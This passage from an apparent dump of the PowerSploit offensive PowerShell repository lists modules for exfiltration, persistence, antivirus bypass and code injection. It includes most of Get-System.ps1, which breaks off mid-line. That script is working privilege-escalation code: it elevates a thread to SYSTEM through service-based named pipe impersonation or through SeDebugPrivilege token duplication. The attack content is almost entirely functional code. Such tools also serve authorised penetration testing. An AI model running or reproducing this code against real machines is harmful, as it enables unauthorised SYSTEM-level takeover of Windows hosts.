Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\stdafx.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\targetver.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFS.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFSParser.cpp\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFSParser.vcxproj\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFSParser.vcxproj.filters\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFS_Attribute.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFS_Common.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFS_DataType.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\NTFS_FileRecord.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\ReadMe.txt\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\stdafx.cpp\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\stdafx.h\" />\n    <Compile Include=\"Exfiltration\\NTFSParser\\NTFSParser\\targetver.h\" />\n    <Compile Include=\"Exfiltration\\Out-Minidump.ps1\" />\n    <Compile Include=\"Exfiltration\\Usage.md\" />\n    <Compile Include=\"Exfiltration\\VolumeShadowCopyTools.ps1\" />\n    <Compile Include=\"LICENSE\" />\n    <Compile Include=\"Mayhem\\Mayhem.psd1\" />\n    <Compile Include=\"Mayhem\\Mayhem.psm1\" />\n    <Compile Include=\"Mayhem\\Usage.md\" />\n    <Compile Include=\"Persistence\\Persistence.psd1\" />\n    <Compile Include=\"Persistence\\Persistence.psm1\" />\n    <Compile Include=\"Persistence\\Usage.md\" />\n    <Compile Include=\"PowerSploit.psd1\" />\n    <Compile Include=\"PowerSploit.psm1\" />\n    <Compile Include=\"Privesc\\PowerUp.ps1\" />\n    <Compile Include=\"Privesc\\Privesc.psd1\" />\n    <Compile Include=\"Privesc\\Privesc.psm1\" />\n    <Compile Include=\"Privesc\\README.md\" />\n    <Compile Include=\"README.md\" />\n    <Compile Include=\"Recon\\Dictionaries\\admin.txt\" />\n    <Compile Include=\"Recon\\Dictionaries\\generic.txt\" />\n    <Compile Include=\"Recon\\Dictionaries\\sharepoint.txt\" />\n    <Compile Include=\"Recon\\Get-ComputerDetails.ps1\" />\n    <Compile Include=\"Recon\\Get-HttpStatus.ps1\" />\n    <Compile Include=\"Recon\\Invoke-Portscan.ps1\" />\n    <Compile Include=\"Recon\\Invoke-ReverseDnsLookup.ps1\" />\n    <Compile Include=\"Recon\\PowerView.ps1\" />\n    <Compile Include=\"Recon\\README.md\" />\n    <Compile Include=\"Recon\\Recon.psd1\" />\n    <Compile Include=\"Recon\\Recon.psm1\" />\n    <Compile Include=\"ScriptModification\\Out-CompressedDll.ps1\" />\n    <Compile Include=\"ScriptModification\\Out-EncodedCommand.ps1\" />\n    <Compile Include=\"ScriptModification\\Out-EncryptedScript.ps1\" />\n    <Compile Include=\"ScriptModification\\Remove-Comments.ps1\" />\n    <Compile Include=\"ScriptModification\\ScriptModification.psd1\" />\n    <Compile Include=\"ScriptModification\\ScriptModification.psm1\" />\n    <Compile Include=\"ScriptModification\\Usage.md\" />\n    <Compile Include=\"Tests\\CodeExecution.tests.ps1\" />\n    <Compile Include=\"Tests\\PowerSploit.tests.ps1\" />\n    <Compile Include=\"Tests\\Privesc.tests.ps1\" />\n    <Compile Include=\"Tests\\Recon.tests.ps1\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Folder Include=\"AntivirusBypass\\\" />\n    <Folder Include=\"CodeExecution\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL\\DemoDLL\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoDLL_RemoteProcess\\DemoDLL_RemoteProcess\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MDd\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\DemoExe\\DemoExe_MD\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\ExeToInjectInTo\\ExeToInjectInTo\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x64\\\" />\n    <Folder Include=\"CodeExecution\\Invoke-ReflectivePEInjection_Resources\\Shellcode\\x86\\\" />\n    <Folder Include=\"Exfiltration\\\" />\n    <Folder Include=\"Exfiltration\\LogonUser\\\" />\n    <Folder Include=\"Exfiltration\\LogonUser\\LogonUser\\\" />\n    <Folder Include=\"Exfiltration\\LogonUser\\LogonUser\\LogonUser\\\" />\n    <Folder Include=\"Exfiltration\\LogonUser\\LogonUser\\logon\\\" />\n    <Folder Include=\"Exfiltration\\NTFSParser\\\" />\n    <Folder Include=\"Exfiltration\\NTFSParser\\NTFSParserDLL\\\" />\n    <Folder Include=\"Exfiltration\\NTFSParser\\NTFSParser\\\" />\n    <Folder Include=\"Mayhem\\\" />\n    <Folder Include=\"Persistence\\\" />\n    <Folder Include=\"Privesc\\\" />\n    <Folder Include=\"Recon\\\" />\n    <Folder Include=\"Recon\\Dictionaries\\\" />\n    <Folder Include=\"ScriptModification\\\" />\n    <Folder Include=\"Tests\\\" />\n  </ItemGroup>\n  <Import Project=\"$(MSBuildBinPath)\\Microsoft.CSharp.targets\" />\n  <Target Name=\"Build\" />\n</Project>"
  },
  {
    "path": "PowerSploit.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio 14\nVisualStudioVersion = 14.0.23107.0\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{F5034706-568F-408A-B7B3-4D38C6DB8A32}\") = \"PowerSploit\", \"PowerSploit.pssproj\", \"{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Any CPU = Debug|Any CPU\n\t\tRelease|Any CPU = Release|Any CPU\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU\n\t\t{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU\n\t\t{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "Privesc/Get-System.ps1",
    "content": "function Get-System {\n<#\n.SYNOPSIS\n\nGetSystem functionality inspired by Meterpreter's getsystem.\n\nAuthor: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)  \nLicense: BSD 3-Clause  \nRequired Dependencies: PSReflect  \n\n.DESCRIPTION\n\nExecutes \"getsystem\" functionality similar to Meterpreter.\n'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create\na service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege.\nNOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure\ntoken duplication works correctly.\n\n\n.PARAMETER Technique\n\nThe technique to use, 'NamedPipe' or 'Token'.\n\n.PARAMETER ServiceName\n\nThe name of the service used with named pipe impersonation, defaults to 'TestSVC'.\n\n.PARAMETER PipeName\n\nThe name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'.\n\n.PARAMETER RevToSelf\n\nReverts the current thread privileges.\n\n.PARAMETER WhoAmI\n\nSwitch. Display the credentials for the current PowerShell thread.\n\n.EXAMPLE\n\nGet-System\n\nUses named impersonate to elevate the current thread token to SYSTEM.\n\n.EXAMPLE\n\nGet-System -ServiceName 'PrivescSvc' -PipeName 'secret'\n\nUses named impersonate to elevate the current thread token to SYSTEM\nwith a custom service and pipe name.\n\n.EXAMPLE\n\nGet-System -Technique Token\n\nUses token duplication to elevate the current thread token to SYSTEM.\n\n.EXAMPLE\n\nGet-System -WhoAmI\n\nDisplays the credentials for the current thread.\n\n.EXAMPLE\n\nGet-System -RevToSelf\n\nReverts the current thread privileges.\n\n.LINK\n\nhttps://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c\nhttps://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot\nhttp://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nhttp://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\n    [CmdletBinding(DefaultParameterSetName = 'NamedPipe')]\n    param(\n        [Parameter(ParameterSetName = 'NamedPipe')]\n        [Parameter(ParameterSetName = 'Token')]\n        [String]\n        [ValidateSet('NamedPipe', 'Token')]\n        $Technique = 'NamedPipe',\n\n        [Parameter(ParameterSetName = 'NamedPipe')]\n        [String]\n        $ServiceName = 'TestSVC',\n\n        [Parameter(ParameterSetName = 'NamedPipe')]\n        [String]\n        $PipeName = 'TestSVC',\n\n        [Parameter(ParameterSetName = 'RevToSelf')]\n        [Switch]\n        $RevToSelf,\n\n        [Parameter(ParameterSetName = 'WhoAmI')]\n        [Switch]\n        $WhoAmI\n    )\n\n    $ErrorActionPreference = 'Stop'\n\n    # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html\n    function Local:Get-DelegateType\n    {\n        Param\n        (\n            [OutputType([Type])]\n\n            [Parameter( Position = 0)]\n            [Type[]]\n            $Parameters = (New-Object Type[](0)),\n\n            [Parameter( Position = 1 )]\n            [Type]\n            $ReturnType = [Void]\n        )\n\n        $Domain = [AppDomain]::CurrentDomain\n        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n        $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\n        Write-Output $TypeBuilder.CreateType()\n    }\n\n    # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html\n    function Local:Get-ProcAddress\n    {\n        Param\n        (\n            [OutputType([IntPtr])]\n\n            [Parameter( Position = 0, Mandatory = $True )]\n            [String]\n            $Module,\n\n            [Parameter( Position = 1, Mandatory = $True )]\n            [String]\n            $Procedure\n        )\n\n        # Get a reference to System.dll in the GAC\n        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n        # Get a reference to the GetModuleHandle and GetProcAddress methods\n        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n        # Get a handle to the module specified\n        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n        $tmpPtr = New-Object IntPtr\n        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n        # Return the address of the function\n        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n    }\n\n    # performs named pipe impersonation to elevate to SYSTEM without needing\n    #   SeDebugPrivilege\n    function Local:Get-SystemNamedPipe {\n        param(\n            [String]\n            $ServiceName = 'TestSVC',\n\n            [String]\n            $PipeName = 'TestSVC'\n        )\n\n        $Command = \"%COMSPEC% /C start %COMSPEC% /C `\"timeout /t 3 >nul&&echo $PipeName > \\\\.\\pipe\\$PipeName`\"\"\n\n        Add-Type -Assembly System.Core\n\n        # create the named pipe used for impersonation and set appropriate permissions\n        $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity\n        $AccessRule = New-Object System.IO.Pipes.PipeAccessRule('Everyone', 'ReadWrite', 'Allow')\n        $PipeSecurity.AddAccessRule($AccessRule)\n        $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName, 'InOut', 100, 'Byte', 'None', 1024, 1024, $PipeSecurity)\n\n        $PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()\n\n        # Declare/setup all the needed API function\n        #   adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html\n        $ImpersonateNamedPipeClientAddr = Get-ProcAddress Advapi32.dll ImpersonateNamedPipeClient\n        $ImpersonateNamedPipeClientDelegate = Get-DelegateType @( [Int] ) ([Int])\n        $ImpersonateNamedPipeClient = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateNamedPipeClientAddr, $ImpersonateNamedPipeClientDelegate)\n\n        $CloseServiceHandleAddr = Get-ProcAddress Advapi32.dll CloseServiceHandle\n        $CloseServiceHandleDelegate = Get-DelegateType @( [IntPtr] ) ([Int])\n        $CloseServiceHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseServiceHandleAddr, $CloseServiceHandleDelegate)\n\n        $OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA\n        $OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr])\n        $OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate)\n\n        $OpenServiceAAddr = Get-ProcAddress Advapi32.dll OpenServiceA\n        $OpenServiceADelegate = Get-DelegateType @( [IntPtr], [String], [Int]) ([IntPtr])\n        $OpenServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenServiceAAddr, $OpenServiceADelegate)\n\n        $CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA\n        $CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr])\n        $CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate)\n\n        $StartServiceAAddr = Get-ProcAddress Advapi32.dll StartServiceA\n        $StartServiceADelegate = Get-DelegateType @( [IntPtr], [Int], [Int]) ([IntPtr])\n        $StartServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StartServiceAAddr, $StartServiceADelegate)\n\n        $DeleteServiceAddr = Get-ProcAddress Advapi32.dll DeleteService\n        $DeleteServiceDelegate = Get-DelegateType @( [IntPtr] ) ([IntPtr])\n        $DeleteService = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DeleteServiceAddr, $DeleteServiceDelegate)\n\n        $GetLastErrorAddr = Get-ProcAddress Kernel32.dll GetLastError\n        $GetLastErrorDelegate = Get-DelegateType @() ([Int])\n        $GetLastError = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetLastErrorAddr, $GetLastErrorDelegate)\n\n        # Step 1 - OpenSCManager()\n        # 0xF003F = SC_MANAGER_ALL_ACCESS\n        #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx\n        Write-Verbose '[Get-System] Opening service manager'\n        $ManagerHandle = $OpenSCManagerA.Invoke('\\\\localhost', 'ServicesActive', 0xF003F)\n        Write-Verbose \"[Get-System] Service manager handle: $ManagerHandle\"\n\n        # if we get a non-zero handle back, everything was successful\n        if ($ManagerHandle -and ($ManagerHandle -ne 0)) {\n\n            # Step 2 - CreateService()\n            # 0xF003F = SC_MANAGER_ALL_ACCESS\n            # 0x10 = SERVICE_WIN32_OWN_PROCESS\n            # 0x3 = SERVICE_DEMAND_START\n            # 0x1 = SERVICE_ERROR_NORMAL\n            Write-Verbose \"[Get-System] Creating new service: '$ServiceName'\"\n            try {\n                $ServiceHandle = $CreateServiceA.Invoke($ManagerHandle, $ServiceName, $ServiceName, 0xF003F, 0x10, 0x3, 0x1, $Command, $null, $null, $null, $null, $null)\n                $err = $GetLastError.Invoke()\n            }\n            catch {\n                Write-Warning \"Error creating service : $_\"\n                $ServiceHandle = 0\n            }\n            Write-Verbose \"[Get-System] CreateServiceA Handle: $ServiceHandle\"\n\n            if ($ServiceHandle -and ($ServiceHandle -ne 0)) {\n                $Success = $True\n                Write-Verbose '[Get-System] Service successfully created'\n\n                # Step 3 - CloseServiceHandle() for the service handle\n                Write-Verbose '[Get-System] Closing service handle'\n                $Null = $CloseServiceHandle.Invoke($ServiceHandle)\n\n                # Step 4 - OpenService()\n                Write-Verbose \"[Get-System] Opening the service '$ServiceName'\"\n                $ServiceHandle = $OpenServiceA.Invoke($ManagerHandle, $ServiceName, 0xF003F)\n                Write-Verbose \"[Get-System] OpenServiceA handle: $ServiceHandle\"\n\n                if ($ServiceHandle -and ($ServiceHandle -ne 0)){\n\n                    # Step 5 - StartService()\n                    Write-Verbose '[Get-System] Starting the service'\n                    $val = $StartServiceA.Invoke($ServiceHandle, $null, $null)\n                    $err = $GetLastError.Invoke()\n\n                    # if we successfully started the service, let it breathe and then delete it\n                    if ($val -ne 0){\n                        Write-Verbose '[Get-System] Service successfully started'\n                        # breathe for a second\n                        Start-Sleep -s 1\n                    }\n                    else{\n                        if ($err -eq 1053){\n                            Write-Verbose \"[Get-System] Command didn't respond to start\"\n                        }\n                        else{\n                            Write-Warning \"[Get-System] StartService failed, LastError: $err\"\n                        }\n                        # breathe for a second\n                        Start-Sleep -s 1\n                    }\n\n                    # start cleanup\n                    # Step 6 - DeleteService()\n                    Write-Verbose \"[Get-System] Deleting the service '$ServiceName'\"\n                    $val = $DeleteService.invoke($ServiceHandle)\n                    $err = $GetLastError.Invoke()\n\n                    if ($val -eq 0){\n                        Write-Warning \"[Get-System] DeleteService failed, LastError: $err\"\n                    }\n                    else{\n                        Write-Verbose '[Get-System] Service successfully deleted'\n                    }\n\n                    # Step 7 - CloseServiceHandle() for the service handle\n                    Write-Verbose '[Get-System] Closing the service handle'\n                    $val = $CloseServiceHandle.Invoke($ServiceHandle)\n                    Write-Verbose '[Get-System] Service handle closed off'\n                }\n                else {\n                    Write-Warning \"[Get-System] OpenServiceA failed, LastError: $err\"\n                }\n            }\n\n            else {\n                Write-Warning \"[Get-System] CreateService failed, LastError: $err\"\n            }\n\n            # final cleanup - close off the manager handle\n            Write-Verbose '[Get-System] Closing the manager handle'\n            $Null = $CloseServiceHandle.Invoke($ManagerHandle)\n        }\n        else {\n            # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx\n            Write-Warning \"[Get-System] OpenSCManager failed, LastError: $err\"\n        }\n\n        if($Success) {\n            Write-Verbose '[Get-System] Waiting for pipe connection'\n            $Pipe.WaitForConnection()\n\n            $Null = (New-Object System.IO.StreamReader($Pipe)).ReadToEnd()\n\n            $Out = $ImpersonateNamedPipeClient.Invoke([Int]$PipeHandle)\n            Write-Verbose \"[Get-System] ImpersonateNamedPipeClient: $Out\"\n        }\n\n        # clocse off the named pipe\n        $Pipe.Dispose()\n    }\n\n    # performs token duplication to elevate to SYSTEM\n    #   needs SeDebugPrivilege\n    # written by @mattifestation and adapted from https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot\n    Function Local:Get-SystemToken {\n        [CmdletBinding()] param()\n\n        $DynAssembly = New-Object Reflection.AssemblyName('AdjPriv')\n        $AssemblyBuilder = [Appdomain]::Currentdomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)\n        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('AdjPriv', $False)\n        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'\n\n        $TokPriv1LuidTypeBuilder = $ModuleBuilder.DefineType('TokPriv1Luid', $Attributes, [System.ValueType])\n        $TokPriv1LuidTypeBuilder.DefineField('Count', [Int32], 'Public') | Out-Null\n        $TokPriv1LuidTypeBuilder.DefineField('Luid', [Int64], 'Public') | Out-Null\n        $TokPriv1LuidTypeBuilder.DefineField('Attr', [Int32], 'Public') | Out-Null\n        $TokPriv1LuidStruct = $TokPriv1LuidTypeBuilder.CreateType()\n\n        $LuidTypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType])\n        $LuidTypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null\n        $LuidTypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null\n        $LuidStruct = $LuidTypeBuilder.CreateType()\n\n        $Luid_and_AttributesTypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType])\n        $Luid_and_AttributesTypeBuilder.DefineField('Luid', $LuidStruct, 'Public') | Out-Null\n        $Luid_and_AttributesTypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null\n        $Luid_and_AttributesStruct = $Luid_and_AttributesTypeBuilder.CreateType()\n\n        $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n        $ConstructorValue = [Runtime.InteropServices.UnmanagedType]::ByValArray\n        $FieldArray = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\n        $TokenPrivilegesTypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType])\n        $TokenPrivilegesTypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null\n        $PrivilegesField = $TokenPrivilegesTypeBuilder.DefineField('Privileges', $Luid_and_AttributesStruct.MakeArrayType(), 'Public')\n        $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 1))\n        $PrivilegesField.SetCustomAttribute($AttribBuilder)\n        # $TokenPrivilegesStruct = $TokenPrivilegesTypeBuilder.CreateType()\n\n        $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder(\n            ([Runtime.InteropServices.DllImportAttribute].GetConstructors()[0]),\n            'advapi32.dll',\n            @([Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')),\n            @([Bool] $True)\n        )\n\n        $AttribBuilder2 = New-Object Reflection.Emit.CustomAttributeBuilder(\n            ([Runtime.InteropServices.DllImportAttribute].GetConstructors()[0]),\n            'kernel32.dll',\n            @([Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')),\n            @([Bool] $True)\n        )\n\n        $Win32TypeBuilder = $ModuleBuilder.DefineType('Win32Methods', $Attributes, [ValueType])\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'OpenProcess',\n            'kernel32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [IntPtr],\n            @([UInt32], [Bool], [UInt32]),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder2)\n\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'CloseHandle',\n            'kernel32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [Bool],\n            @([IntPtr]),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder2)\n\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'DuplicateToken',\n            'advapi32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [Bool],\n            @([IntPtr], [Int32], [IntPtr].MakeByRefType()),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder)\n\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'SetThreadToken',\n            'advapi32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [Bool],\n            @([IntPtr], [IntPtr]),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder)\n\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'OpenProcessToken',\n            'advapi32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [Bool],\n            @([IntPtr], [UInt32], [IntPtr].MakeByRefType()),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder)\n\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'LookupPrivilegeValue',\n            'advapi32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [Bool],\n            @([String], [String], [IntPtr].MakeByRefType()),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder)\n\n        $Win32TypeBuilder.DefinePInvokeMethod(\n            'AdjustTokenPrivileges',\n            'advapi32.dll',\n            [Reflection.MethodAttributes] 'Public, Static',\n            [Reflection.CallingConventions]::Standard,\n            [Bool],\n            @([IntPtr], [Bool], $TokPriv1LuidStruct.MakeByRefType(),[Int32], [IntPtr], [IntPtr]),\n            [Runtime.InteropServices.CallingConvention]::Winapi,\n            'Auto').SetCustomAttribute($AttribBuilder)\n\n        $Win32Methods = $Win32TypeBuilder.CreateType()\n\n        $Win32Native = [Int32].Assembly.GetTypes() | Where-Object {$_.Name -eq 'Win32Native'}\n        $GetCurrentProcess = $Win32Native.GetMethod(\n            'GetCurrentProcess',\n            [Reflection.BindingFlags] 'NonPublic, Static'\n        )\n\n        $SE_PRIVILEGE_ENABLED = 0x00000002\n        $STANDARD_RIGHTS_REQUIRED = 0x000F0000\n        # $STANDARD_RIGHTS_READ = 0x00020000\n        $TOKEN_ASSIGN_PRIMARY = 0x00000001\n        $TOKEN_DUPLICATE = 0x00000002\n        $TOKEN_IMPERSONATE = 0x00000004\n        $TOKEN_QUERY = 0x00000008\n        $TOKEN_QUERY_SOURCE = 0x00000010\n        $TOKEN_ADJUST_PRIVILEGES = 0x00000020\n        $TOKEN_ADJUST_GROUPS = 0x00000040\n        $TOKEN_ADJUST_DEFAULT = 0x00000080\n        $TOKEN_ADJUST_SESSIONID = 0x00000100\n        # $TOKEN_READ = $STANDARD_RIGHTS_READ -bor $TOKEN_QUERY\n        $TOKEN_ALL_ACCESS = $STANDARD_RIGHTS_REQUIRED -bor\n            $TOKEN_ASSIGN_PRIMARY -bor\n            $TOKEN_DUPLICATE -bor\n            $TOKEN_IMPERSONATE -bor\n            $TOKEN_QUERY -bor\n            $TOKEN_QUERY_SOURCE -bor\n            $TOKEN_ADJUST_PRIVILEGES -bor\n            $TOKEN_ADJUST_GROUPS -bor\n            $TOKEN_ADJUST_DEFAULT -bor\n            $TOKEN_ADJUST_SESSIONID\n\n        [long]$Luid = 0\n\n        $tokPriv1Luid = [Activator]::CreateInstance($TokPriv1LuidStruct)\n        $tokPriv1Luid.Count = 1\n        $tokPriv1Luid.Luid = $Luid\n        $tokPriv1Luid.Attr = $SE_PRIVILEGE_ENABLED\n\n        $RetVal = $Win32Methods::LookupPrivilegeValue($Null, 'SeDebugPrivilege', [ref]$tokPriv1Luid.Luid)\n\n        $htoken = [IntPtr]::Zero\n        $RetVal = $Win32Methods::OpenProcessToken($GetCurrentProcess.Invoke($Null, @()), $TOKEN_ALL_ACCESS, [ref]$htoken)\n\n        # $tokenPrivileges = [Activator]::CreateInstance($TokenPrivilegesStruct)\n        $RetVal = $Win32Methods::AdjustTokenPrivileges($htoken, $False, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)\n\n        if(-not($RetVal)) {\n            Write-Error \"[Get-System] AdjustTokenPrivileges failed, RetVal : $RetVal\" -ErrorAction Stop\n        }\n\n        $LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value\n\n        $SystemHandle = Get-WmiObject 